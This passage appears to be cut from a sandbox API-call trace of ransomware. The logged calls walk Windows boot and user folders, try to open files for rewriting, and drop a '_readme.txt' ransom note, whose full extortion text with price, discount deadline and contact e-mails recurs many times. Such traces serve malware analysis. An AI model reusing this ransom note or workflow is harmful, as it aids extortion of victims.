lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.891] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.891] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.891] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0228.891] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0228.891] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.891] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.892] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.892] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.892] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0228.892] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.892] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.892] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.892] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.892] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.893] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.893] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.893] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.893] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0228.893] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0228.893] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.893] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.893] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.893] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.893] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0228.893] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.894] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.894] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.894] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.894] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.894] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.894] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.894] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.894] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0228.894] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0228.894] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.895] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.895] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.895] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.895] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0228.895] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.895] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.895] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.895] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.895] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.896] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.896] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.896] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.896] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0228.896] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0228.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf553c810, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf553c810, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.896] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0228.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0228.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0228.897] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.897] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.897] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 